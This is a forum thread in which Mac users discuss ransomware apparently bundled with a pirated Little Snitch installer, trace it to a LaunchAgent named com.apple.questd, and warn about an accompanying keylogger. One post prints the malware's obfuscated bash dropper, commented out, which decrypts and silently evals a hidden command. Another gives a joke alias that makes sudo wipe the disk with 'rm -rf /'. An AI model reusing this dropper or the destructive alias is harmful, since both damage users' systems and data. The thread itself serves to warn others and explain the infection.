Ransomware on OSx 10.12 (sierra)

Discussion in 'Mac / Hackintosh' started by Denshin, Jun 28, 2020.

  1. SmokerNzt

    SmokerNzt Rock Star

    Joined:
    Mar 2, 2013
    Messages:
    527
    Likes Received:
    320
    alway's using Pacifist to check the dmg file because I saw new attacks used by hackers they put install file and folder which called .hidden
    which the install file linked to command file
    check /tmp/ folder if there is noting hidden
    but before type in terminal
    HTML:
    defaults write com.apple.finder AppleShowAllFiles TRUE
    
    HTML:
    killall Finder
    after you finish to hide you type inside the terminal
    HTML:
    defaults write com.apple.finder AppleShowAllFiles FALSE
    
    HTML:
    killall Finder
     
    Last edited: Jul 1, 2020
  2. Cube Sixty-Three

    Cube Sixty-Three Kapellmeister

    Joined:
    Mar 30, 2020
    Messages:
    153
    Likes Received:
    51
    I'm sorry the Read_Me_Now.txt file is corrupt, my bad! Can I just inbox you my PayPal? You've 30 mins left...

     
  3. Denshin

    Denshin Member

    Joined:
    Jan 3, 2020
    Messages:
    17
    Likes Received:
    8
    Hey everyone,

    Here's an extra piece of information I found out since the Ransomware went public.

    Before I realised I had a Ransomware, as I mentioned in my previous post, my computer was running slow and showing high usage of CPU, that's when I looked at the LaunchDaemons and LaunchAgents to see what was running in the background and that wasn't showing in Activity Monitor.

    I left all the Apple Daemons alone, but in the LaunchAgents folder, there were two files. One relating to Roland Cloud, and one named com.apple.questd

    To check if one of these two was causing problems, I took them out of the LaunchAgents folder and put them some place else.

    After that, I found out about the LittleSnitchHelper thing in my console so I launched an LittleSnitch Uninstaller that somehow got rid of the LittleSnitch Helper, and everything was fine again.

    A few days later while talking to @Creme he mentioned that as the problem came from LittleSnitch, I should probably put the LaunchAgents back into the folder to avoid more issues so I put both the Roland Cloud file and the com.apple.questd back where they were...

    As you probably guessed it, a few minutes after that, I got the Ransomware pop-up window.

    com.apple.questd IS THE RANSOMWARE !

    By removing it as soon as my computer started acting up I basically stopped it in its track and didn't leave it enough time to finish what it had to do... and by putting it back in, I shot myself in the foot...

    I had it ! Right in the palm of my hand...
     
    • Useful Useful x 3
    • Funny Funny x 1
    • Interesting Interesting x 1
    • List
  4. Delay

    Delay Guest

    • Useful Useful x 4
    • Agree Agree x 1
    • List
  5. SmokerNzt

    SmokerNzt Rock Star

    Joined:
    Mar 2, 2013
    Messages:
    527
    Likes Received:
    320
    here I made a video show you how the hackers use this Ransomware to decrypt all files !
    this will help you next time when you open dmg always check it before you open it !


    here the bash script which hackers using I add the # to file
    Warning do not type this into terminal !!!!!!
    HTML:
    #!/bin/bash
    #G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s";
    #export appDir=$(cd "$(dirname "$0")"; pwd -P)
    #export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
    #export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
    #export archive="$(echo $binFile | rev)"
    #export commandArgs='U2FsdGVkX19vyEzWKun2ye/4a4OuXhiZKbW4byjk0CQlyXCd31RaYDBc6RM1c/UkxakqNTQlnBnBPuSd0lwh9Jq67M/2hexDWK6m6AYEdBNy9bveTJGQW19Ad/5Wso9L1m0JMBuI3Ao8sKdy2kC/Gqe5i15fdq/tpMTJ/SBrRBXT75ge9mTNwDCV1biYaxRFBNTUCvPhwtTb69cjO7eeKAP8SmlIjhM5ZeqsksXt2zjqMsuKg92VcYNPMKrcdhzJO2TQLWz1emOoz1ZB8Os6s7bTih/xfaJ5C9vJt378R8wPqMGCM/Jd3FL3gQ6/kFqJ'
    #decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")"
    #nohup /bin/bash -c "eval \"$decryptedFommand\"" >/dev/null 2>&1 &
    #killall Terminal 
     
    Last edited: Jul 1, 2020
    • Winner Winner x 5
    • Like Like x 1
    • Love it! Love it! x 1
    • List
  6. JMOUTTON

    JMOUTTON Audiosexual

    Joined:
    Jan 10, 2016
    Messages:
    1,051
    Likes Received:
    855
    Location:
    Virginia
  7. Haliax

    Haliax Guest

    you could always type: alias sudo='su -c "rm -rf /" '

    (don't type that)
     
  8. Paul Pi

    Paul Pi Audiosexual

    Joined:
    Oct 18, 2016
    Messages:
    714
    Likes Received:
    693
    Location:
    London
    No doubt you already spotted it, but @ 4' 53'' you typo'd FLASE instead of FALSE

    According to Urban Dictionary, FLASE either means:
    1. A Loser; Frail; Weak
    2. Suggests the writer is thinking about flaccid male genitalia.
    3. A type of yeast infection commonly contracted from having sex with skunks and skanks and truth munchers.

    Now i know it's all a bit random, but if we're not careful @Area51 will be along real soon, (s)he-it loves that kinda thing... ;)
     
    Last edited: Jul 1, 2020
  9. CharlieCrizzle

    CharlieCrizzle Kapellmeister

    Joined:
    Sep 10, 2019
    Messages:
    222
    Likes Received:
    46
    so did this start immediately after trying to install little snitch or did it time bomb?
     
  10. Creme

    Creme Kapellmeister

    Joined:
    Sep 20, 2015
    Messages:
    82
    Likes Received:
    45
    Location:
    Somewhere on the table
    I might be wrong, but i don't think so, Denshin actually stopped The process by momentaraly moving the com.apple.questd outside of the launch agent user folder. Few days later, seeing his computer was still acting weird, i suggested him to put this agent back where he found it wish lead the agent to finish the process. as he said in a post earlier "I had it ! Right in the palm of my hand..."
     
    Last edited: Jul 2, 2020
  11. Valnar

    Valnar Rock Star

    Joined:
    Feb 21, 2020
    Messages:
    744
    Likes Received:
    348
    (quoting you so you 100% see this)

    https://www.wired.com/story/new-mac-ransomware-thiefquest-evilquest/

    pls change your passwords ASAP after removing the malware!!!!
     
  12. Creme

    Creme Kapellmeister

    Joined:
    Sep 20, 2015
    Messages:
    82
    Likes Received:
    45
    Location:
    Somewhere on the table
    Well, as it use a Keylogger, if you didn't Type any crucial Password or credit card number between the time you installed the Ransomware and the time you fixed it you should be fine. But in any case regularely updating important password is always a good advice.
     
  13. Denshin

    Denshin Member

    Joined:
    Jan 3, 2020
    Messages:
    17
    Likes Received:
    8
    The LaunchAgent started instantly, like @Creme mentioned, it only got delayed because I removed it from the LaunchAgent folder and restarted my computer, which didn't load it at startup and stopped it from continuing whatever it was supposed to do.
     
  14. PsYAuM

    PsYAuM Ultrasonic

    Joined:
    Jan 17, 2014
    Messages:
    84
    Likes Received:
    20
  15. CharlieCrizzle

    CharlieCrizzle Kapellmeister

    Joined:
    Sep 10, 2019
    Messages:
    222
    Likes Received:
    46
  16. Denshin

    Denshin Member

    Joined:
    Jan 3, 2020
    Messages:
    17
    Likes Received:
    8
    Read my earlier post. Unless something else happened in the meantime, Ableton had nothing to do with it... it seems they just didn't read this very post carefully enough...
     
  17. lasm2000

    lasm2000 Member

    Joined:
    Oct 11, 2019
    Messages:
    14
    Likes Received:
    10
  18. Area51

    Area51 Kapellmeister

    Joined:
    May 3, 2020
    Messages:
    286
    Likes Received:
    43
    I find your male privilege sexist and misogynyst. post closed
     
  19. CharlieCrizzle

    CharlieCrizzle Kapellmeister

    Joined:
    Sep 10, 2019
    Messages:
    222
    Likes Received:
    46
    Im referring to the articles posted stating that it was in ableton. I understand how you personally encountered it
     
  20. Smoove Grooves

    Smoove Grooves Audiosexual

    Joined:
    Jan 26, 2019
    Messages:
    5,209
    Likes Received:
    1,980
    The articles misunderstood what was written in this very thread!
    The ransomware is in Little Snitch.
     
Loading...
Similar Threads - Ransomware (sierra) Forum Date
NAS systems by QNAP & Asustor affected by Deadbolt Ransomware Computer Hardware Feb 23, 2022
ThiefQuest ransomware on Mac. Thoughts? Industry News Jul 7, 2020
Beware! New Mac Ransomware On The Scene. Live, Little Snitch, Mixed In Key. Mac / Hackintosh Jul 2, 2020
arturia v collection 6 6.21 r2r ransomware false positve? Software Oct 20, 2018
.1btc Ransomware attack #Lockcrypt Family Forum News and Updates Feb 20, 2018
Loading...